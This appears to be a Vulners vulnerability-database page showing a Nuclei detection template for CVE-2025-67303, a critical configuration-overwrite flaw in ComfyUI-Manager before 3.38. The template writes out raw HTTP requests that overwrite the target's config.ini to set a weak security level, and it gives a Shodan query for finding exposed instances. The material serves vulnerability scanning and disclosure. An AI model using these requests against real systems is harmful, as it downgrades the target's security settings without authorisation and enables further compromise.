Lucene search
K

ComfyUI-Manager < 3.38 - Configuration Overwrite

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Insecure file storage in ComfyUI-Manager before 3.38 enables remote config manipulation; update to 3.38 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-67303
14 Jan 202610:22
githubexploit
GithubExploit
Exploit for CVE-2025-67303
24 Jan 202608:42
githubexploit
Circl
CVE-2025-67303
5 Jan 202620:25
circl
CNNVD
ComfyUI-Manager 安全漏洞
5 Jan 202600:00
cnnvd
CVE
CVE-2025-67303
5 Jan 202600:00
cve
Cvelist
CVE-2025-67303
5 Jan 202600:00
cvelist
EUVD
EUVD-2026-0815
22 Jun 202619:58
euvd
Github Security Blog
Duplicate Advisory: ComfyUI-Manager has an Unprotected Alternate Channel (CWE-420)
5 Jan 202618:30
github
Github Security Blog
ComfyUI-Manager has an Unprotected Alternate Channel (CWE-420)
22 Jun 202619:58
github
NVD
CVE-2025-67303
5 Jan 202616:15
nvd
Rows per page
id: CVE-2025-67303

info:
  name: ComfyUI-Manager < 3.38 - Configuration Overwrite
  author: maciejklimek
  severity: critical
  description: |
    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.
  impact: |
    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.
  remediation: |
    Update to version 3.38 or later.
  reference:
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-67303
    epss-score: 0.01361
    epss-percentile: 0.68399
    cwe-id: CWE-420
  metadata:
    verified: true
    max-request: 3
    vendor: comfy-org
    product: comfyui-manager
    shodan-query: http.title:"ComfyUI"
  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev

http:
  - raw:
      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        [default]
        security_level = weak

      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_1, '[default]', 'security_level')"
          - "contains(body_3, 'security_level = weak')"
          - "status_code_1 == 200 && status_code_3 == 200"
        condition: and
# digest: 4a0a0047304502202b2778120ffeabae89a1df515e1ab1b10065a652f6b4ac7393c737332cd112260221008040b47ed974e45a74b82e4ae4c09cf4120cbb899f54f8435399a555c030248b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 11:22Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.5
EPSS0.01361
SSVC
20